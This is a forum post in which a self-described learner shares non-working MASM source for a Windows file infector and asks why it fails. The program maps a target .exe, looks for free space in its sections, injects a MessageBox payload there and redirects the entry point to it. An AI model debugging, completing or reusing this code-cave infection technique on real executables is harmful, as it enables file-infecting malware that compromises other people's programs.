add new code in the end of section - Programmers Heaven

Howdy, Stranger!

It looks like you're new here. If you want to get involved, click one of these buttons!

Categories

Welcome to the new platform of Programmer's Heaven! We apologize for the inconvenience caused, if you visited us from a broken link of the previous version. The main reason to move to a new platform is to provide more effective and collaborative experience to you all. Please feel free to experience the new platform and use its exciting features. Contact us for any issue that you need to get clarified. We are more than happy to help you.

add new code in the end of section

At first I want to tell one important stuff. I don't want to write powerful virus. I want to understand how they are working and how antivirus programmes working.

I want to add code in the end of section. I wrote file which I want to modify.
Here is the code of file-victim:
[code]
.data

DB_strOutput DB "Dosen't infected",0
.code
_start:
invoke MessageBox, 0, offset DB_strOutput, offset DB_strOutput, MB_OK
push 0
call ExitProcess
end _start[/code]

I wrote code to modify fiile-victim:
[code].586p
.model flat,stdcall
option casemap:none

include masm32includewindows.inc
include masm32includeuser32.inc
includelib masm32libuser32.lib

include masm32includekernel32.inc
includelib masm32libkernel32.lib


.data

DB_strAddress DB "C:/firstMalware_victim.exe",0
DD_hFile_Mapping DD ?
DD_adressOfMappingFile DD ?
DD_hFile DD ?
DW_numberOfSections DW ?;????? ??????
DD_addressOfIMAGE_DOS_HEADER DD ?
DD_addressOfIMAGE_FILE_HEADER DD ?
DD_addressOfIMAGE_OPTIONAL_HEADER DD ?
DD_addressOfIMAGE_NT_HEADERS DD ?
DD_addressOfDataDirectory DD ?
DD_addressOfIMAGE_SECTION_HEADER DD ?
DB_string_forInfect DB "LOL",0;?????? ?????? 4 ?????
DD_sizeOfCode DD 0;size of code which we want to write in victim file
DD_addressToJump DD ?
DD_addressBeginOfNewCode DD ?;address where we implant new code
DD_addressOfNewString DD ?
.code
_start:

;open file
push 0
push FILE_ATTRIBUTE_NORMAL;The file does not have other attributes set. This attribute is valid only if used alone.
push OPEN_EXISTING
push 0
push FILE_SHARE_DELETE
push GENERIC_WRITE or GENERIC_READ
push offset DB_strAddress
call CreateFileA
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

cmp EAX, -1;ERROR?
jz EXIT

mov DD_hFile, EAX
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;call CreateFileMapping
push 0
push 0
push 0
push PAGE_READWRITE
push 0
push DD_hFile
call CreateFileMapping
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
mov DD_hFile_Mapping, EAX
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

;call MapViewOfFile
;Maps a view of a file mapping into the address space of a calling process.
push 0
push 0
push 0
push FILE_MAP_READ or FILE_MAP_WRITE
push DD_hFile_Mapping
call MapViewOfFile;Maps a view of a file mapping into the address space of a calling process.
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

mov DD_hFile_Mapping, EAX

cmp EAX, -1;ERROR?
jz EXIT


mov DD_adressOfMappingFile, EAX;load address of loaded file
mov EDI, DD_hFile_Mapping;set address of first byte of mapping-file
assume EDI:ptr IMAGE_DOS_HEADER;EDI points to IMAGE_DOS_HEADER
mov DD_addressOfIMAGE_DOS_HEADER, EDI

add EDI, [EDI].e_lfanew
mov DD_addressOfIMAGE_NT_HEADERS, EDI
assume EDI:ptr IMAGE_NT_HEADERS
lea EAX, [EDI].FileHeader
mov AX, [EDI].FileHeader.NumberOfSections
mov DW_numberOfSections, AX
mov EAX, DD_addressOfIMAGE_FILE_HEADER
lea EDI, [EDI].OptionalHeader
mov DD_addressOfIMAGE_OPTIONAL_HEADER, EDI
assume EDI:ptr IMAGE_OPTIONAL_HEADER
lea EAX, [EDI].DataDirectory
mov DD_addressOfDataDirectory, EAX
mov EAX, DD_addressOfIMAGE_NT_HEADERS
add EAX, sizeof IMAGE_NT_HEADERS
mov DD_addressOfIMAGE_SECTION_HEADER,EAX ;address of Sections Table
assume EAX:ptr IMAGE_SECTION_HEADER
;get to know size of our code which we want to implant
mov EBX, offset Label_forInfect_start
sub EBX, Label_forInfect_end
push EBX
add EBX,4;size of our code with a string
;check sections for a free size
xor ECX, ECX
.while CX < DW_numberOfSections
mov EDX, [EAX].Misc.VirtualSize
sub EDX, [EAX].SizeOfRawData;EBX contains free size in the section
.if EDX >= EBX
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;get to know whrere we should implant new code
mov ECX, [EAX].PointerToRawData
add ECX, [EAX].SizeOfRawData
mov DD_addressBeginOfNewCode, ECX
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
mov ECX, 4
mov ESI, offset DB_string_forInfect
mov DD_addressOfNewString, ESI
mov EDI, DD_addressBeginOfNewCode
cld
rep movsb;copy string to file
add DD_addressBeginOfNewCode, 4
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;copy code
;copy AddressOfEntryPoint
mov ECX, DD_addressOfIMAGE_OPTIONAL_HEADER
assume ECX:ptr IMAGE_OPTIONAL_HEADER
mov ESI, [ECX].AddressOfEntryPoint
mov DD_addressToJump, ESI;copy AddressOfEntryPoint
mov [ECX].AddressOfEntryPoint, offset Label_forInfect_start;change AddressOfEntryPoint
pop EBX
mov ECX, EBX;number of bytes which we should copy
mov ESI, Label_forInfect_start
mov EDI, DD_addressBeginOfNewCode
cld
rep movsb;copy code
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

jmp LabelAfterWritingToTheSections
.endif
add EAX, sizeof IMAGE_SECTION_HEADER
inc CX
.endw
LabelAfterWritingToTheSections:

EXIT:
invoke ExitProcess,0

Label_forInfect_start:
invoke MessageBox,0, offset DB_string_forInfect, offset DB_string_forInfect, 1
push 0
push offset DB_string_forInfect
push offset DB_string_forInfect
push 1
call MessageBox
jmp DD_addressToJump
Label_forInfect_end:
end _start[/code]

I want to add at the begin of victim's file this code:
[code]Label_forInfect_start:
invoke MessageBox,0, offset DB_string_forInfect, offset DB_string_forInfect, 1
push 0
push offset DB_string_forInfect
push offset DB_string_forInfect
push 1
call MessageBox
jmp DD_addressToJump
Label_forInfect_end:[/code]

But I've got one progblem. My program doesn't work.
I opend it in the debugger and found some strange stuffes:
1. There are only 3 sections in the victim's file
2. This condition doesn't excecute:
[code].if EDX >= EBX[/code]
May be I wrote somethin wrong before this.
I assume that I worked incorrectly with lds from IMAGE_SECTION_HEADER.
[code]mov EDX, [EAX].Misc.VirtualSize
sub EDX, [EAX].SizeOfRawData;EBX contains free size in the section[/code]
I saw in the debugger that EDX contains negative value:
FFFFFF92
And the last question. Have I done something wrong here:
[code];get to know whrere we should implant new code
mov ECX, [EAX].PointerToRawData
add ECX, [EAX].SizeOfRawData
mov DD_addressBeginOfNewCode, ECX[/code]


Sign In or Register to comment.